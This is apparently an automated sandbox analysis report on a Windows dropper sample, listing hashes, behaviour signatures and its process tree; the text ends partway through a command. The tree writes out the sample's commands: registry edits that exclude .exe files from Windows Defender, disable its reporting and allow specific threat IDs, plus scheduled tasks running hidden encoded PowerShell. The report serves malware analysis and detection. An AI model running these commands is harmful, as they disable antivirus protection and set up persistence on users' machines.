Analysis
- max time kernel: 150s
- max time network: 159s
- platform: windows11-21h2_x64
- resource: win11-20240221-en
- resource tags: arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 03/04/2024, 10:57
- Static task: static1
- Behavioral task: behavioral1
- Sample: a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe
- Resource: win10v2004-20240226-en
General
- Target: a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe
- Size: 6.7MB
- MD5: 3bcf3ad5da1c9f7f54b99404d5bb2a14
- SHA1: f36359ff1be260d6c59a194c3257a8a2816bc4b7
- SHA256: a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3
- SHA512: 062cd16c7bd808fb9029de8c7bc1188da62d3d47222256cf453f4539809d1de75ea175b3544957e0485e5765bcc8bd11da72ff7525cc746392f114a57500eca3
- SSDEEP: 98304:91OmpDcPHB7oWB0q32sghrEGog5UFI0eDyNGfJ9cnqzdmHQuuWy4rk0yaYWngUxA:91OmSKWBz3lgi+0fYLfsvry4A0y2g4Po
Malware Config
Signatures
- Blocklisted process makes network request (1 IoC)
  - flow 19, pid 3544: rundll32.exe
- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (rundll32.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Install.exe)
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Control Panel\International\Geo\Nation (YyQFmUW.exe)
- Executes dropped EXE (3 IoCs)
  - pid 4212: Install.exe
  - pid 2860: WTYIUVQ.exe
  - pid 4920: YyQFmUW.exe
- Loads dropped DLL (1 IoC)
  - pid 3544: rundll32.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Drops Chrome extension (2 IoCs)
  - File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json (YyQFmUW.exe)
  - File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json (YyQFmUW.exe)
- Drops desktop.ini file(s) (1 IoC)
  - File opened for modification: C:\$RECYCLE.BIN\S-1-5-18\desktop.ini (YyQFmUW.exe)
- Drops file in System32 directory (31 IoCs)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 (YyQFmUW.exe)
  - File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
  - File opened for modification: C:\Windows\system32\GroupPolicy\gpt.ini (WTYIUVQ.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 (YyQFmUW.exe)
  - File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log (powershell.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 (YyQFmUW.exe)
  - File created: C:\Windows\system32\GroupPolicy\gpt.ini (Install.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
  - File opened for modification: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA (YyQFmUW.exe)
  - File created: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (WTYIUVQ.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content (YyQFmUW.exe)
  - File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA (YyQFmUW.exe)
- Drops file in Program Files directory (14 IoCs)
  - File created: C:\Program Files (x86)\yvWovCiVU\IWUSnIA.xml (YyQFmUW.exe)
  - File created: C:\Program Files (x86)\LCifMpYymZWU2\MIqjTUamxhRiS.dll (YyQFmUW.exe)
  - File created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak (YyQFmUW.exe)
  - File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak (YyQFmUW.exe)
  - File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja (YyQFmUW.exe)
  - File created: C:\Program Files (x86)\LCifMpYymZWU2\EVKasNC.xml (YyQFmUW.exe)
  - File created: C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\XDqQbzK.dll (YyQFmUW.exe)
  - File created: C:\Program Files (x86)\mVqQIGUXDOgrC\WVwqAGo.xml (YyQFmUW.exe)
  - File created: C:\Program Files (x86)\gbPxNkbXHfUn\CEULdTQ.dll (YyQFmUW.exe)
  - File created: C:\Program Files (x86)\yvWovCiVU\IjUmhi.dll (YyQFmUW.exe)
  - File created: C:\Program Files (x86)\mVqQIGUXDOgrC\CswRwZy.dll (YyQFmUW.exe)
  - File created: C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi (YyQFmUW.exe)
  - File opened for modification: C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi (YyQFmUW.exe)
  - File created: C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\VCxgmMy.xml (YyQFmUW.exe)
- Drops file in Windows directory (4 IoCs)
  - File created: C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job (schtasks.exe)
  - File created: C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job (schtasks.exe)
  - File created: C:\Windows\Tasks\eGwAoTnpAObQfPU.job (schtasks.exe)
  - File created: C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job (schtasks.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 11 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  - schtasks.exe pids: 1964, 928, 2816, 2356, 1600, 5116, 3320, 4852, 1040, 648, 3128
- Enumerates system info in registry (2 TTPs, 4 IoCs)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (rundll32.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (rundll32.exe)
- Modifies data under HKEY_USERS (64 IoCs)
  All keys below are under \REGISTRY\USER\.DEFAULT\Software\; the process making the change is in parentheses.
  - Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (YyQFmUW.exe)
  - Key created: Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Disallowed (powershell.exe)
  - Set value (int): Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b33ab3a0-0000-0000-0000-d01200000000}\MaxCapacity = "14116" (YyQFmUW.exe)
  - Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" (rundll32.exe)
  - Key created: Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Root (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\trust (powershell.exe)
  - Key created: Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (YyQFmUW.exe)
  - Key created: Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
  - Key created: Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
  - Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix (YyQFmUW.exe)
  - Key created: Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Root (powershell.exe)
  - Key created: Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Disallowed (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
  - Key created: Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\trust (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\CA (powershell.exe)
  - Key created: Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
  - Set value (int): Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" (YyQFmUW.exe)
  - Key created: Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
  - Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (YyQFmUW.exe)
  - Key created: Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
  - Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" (YyQFmUW.exe)
  - Key created: Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
  - Set value (int): Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b33ab3a0-0000-0000-0000-d01200000000}\NukeOnDelete = "0" (YyQFmUW.exe)
  - Key created: Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
  - Key created: Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
  - Key created: Microsoft\SystemCertificates\CA (powershell.exe)
  - Key created: Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
  - Key created: Microsoft\Windows\CurrentVersion\Explorer\BitBucket (YyQFmUW.exe)
  - Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (YyQFmUW.exe)
  - Key created: Microsoft\SystemCertificates\CA (powershell.exe)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  - pid 3872: powershell.EXE (2 entries)
  - pid 3912: powershell.exe (2 entries)
  - pid 1300: powershell.exe (2 entries)
  - pid 2204: powershell.EXE (2 entries)
  - pid 4920: YyQFmUW.exe (remaining 56 entries)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  - Token: SeDebugPrivilege, pid 3872 (powershell.EXE)
  - Token: SeDebugPrivilege, pid 3912 (powershell.exe)
  - Token: SeDebugPrivilege, pid 1300 (powershell.exe)
  - Token: SeDebugPrivilege, pid 2204 (powershell.EXE)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Each row gives the writing process, its image name, and the procid_target column; identical rows are collapsed with their count.
  - PID 2128 wrote to memory of 4212 (a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe, target 80) x3
  - PID 4212 wrote to memory of 3100 (Install.exe, target 82) x3
  - PID 4212 wrote to memory of 2868 (Install.exe, target 84) x3
  - PID 3100 wrote to memory of 4924 (forfiles.exe, target 86) x3
  - PID 2868 wrote to memory of 652 (forfiles.exe, target 87) x3
  - PID 4924 wrote to memory of 3636 (cmd.exe, target 88) x3
  - PID 4924 wrote to memory of 5012 (cmd.exe, target 89) x3
  - PID 652 wrote to memory of 3944 (cmd.exe, target 90) x3
  - PID 652 wrote to memory of 4892 (cmd.exe, target 91) x3
  - PID 4212 wrote to memory of 1600 (Install.exe, target 92) x3
  - PID 4212 wrote to memory of 2140 (Install.exe, target 94) x3
  - PID 3872 wrote to memory of 928 (powershell.EXE, target 98) x2
  - PID 4212 wrote to memory of 2252 (Install.exe, target 103) x3
  - PID 4212 wrote to memory of 1964 (Install.exe, target 105) x3
  - PID 2860 wrote to memory of 3912 (WTYIUVQ.exe, target 108) x3
  - PID 3912 wrote to memory of 4384 (powershell.exe, target 110) x3
  - PID 4384 wrote to memory of 2040 (cmd.exe, target 111) x3
  - PID 3912 wrote to memory of 1720 (powershell.exe, target 112) x3
  - PID 3912 wrote to memory of 708 (powershell.exe, target 113) x3
  - PID 3912 wrote to memory of 968 (powershell.exe, target 114) x3
  - PID 3912 wrote to memory of 4744 (powershell.exe, target 115) x3
  - PID 3912 wrote to memory of 3640 (powershell.exe, target 116) x2
Processes
Each entry gives the image path, the tree depth and PID, the command line, and the signatures that fired for that process; children are indented under their parent.
- C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe (depth 1, PID 2128)
  Command line: "C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe (depth 2, PID 4212)
    Command line: .\Install.exe /XodidE "385118" /S
    Signatures: Checks BIOS information in registry; Executes dropped EXE; Drops file in System32 directory; Enumerates system info in registry; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 3100)
      Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (depth 4, PID 4924)
        Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        Signatures: Suspicious use of WriteProcessMemory
        - \??\c:\windows\SysWOW64\reg.exe (depth 5, PID 3636)
          Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        - \??\c:\windows\SysWOW64\reg.exe (depth 5, PID 5012)
          Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
    - C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 2868)
      Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (depth 4, PID 652)
        Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        Signatures: Suspicious use of WriteProcessMemory
        - \??\c:\windows\SysWOW64\reg.exe (depth 5, PID 3944)
          Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        - \??\c:\windows\SysWOW64\reg.exe (depth 5, PID 4892)
          Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
    - C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 1600)
      Command line: schtasks /CREATE /TN "gEMytGLpP" /SC once /ST 07:52:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      (The -EncodedCommand value is base64 of the UTF-16LE string: start-process -WindowStyle Hidden gpupdate.exe /force)
      Signatures: Creates scheduled task(s)
    - C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 2140)
      Command line: schtasks /run /I /tn "gEMytGLpP"
    - C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 2252)
      Command line: schtasks /DELETE /F /TN "gEMytGLpP"
    - C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 1964)
      Command line: schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe\" hl /Tnsite_idMfj 385118 /S" /V1 /F
      Signatures: Drops file in Windows directory; Creates scheduled task(s)
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 1, PID 3872)
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\gpupdate.exe (depth 2, PID 928)
    Command line: "C:\Windows\system32\gpupdate.exe" /force
- C:\Windows\system32\svchost.exe (depth 1, PID 1996)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
- C:\Windows\system32\svchost.exe (depth 1, PID 460)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
- C:\Windows\system32\gpscript.exe (depth 1, PID 2280)
  Command line: gpscript.exe /RefreshSystemParam
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe hl /Tnsite_idMfj 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ 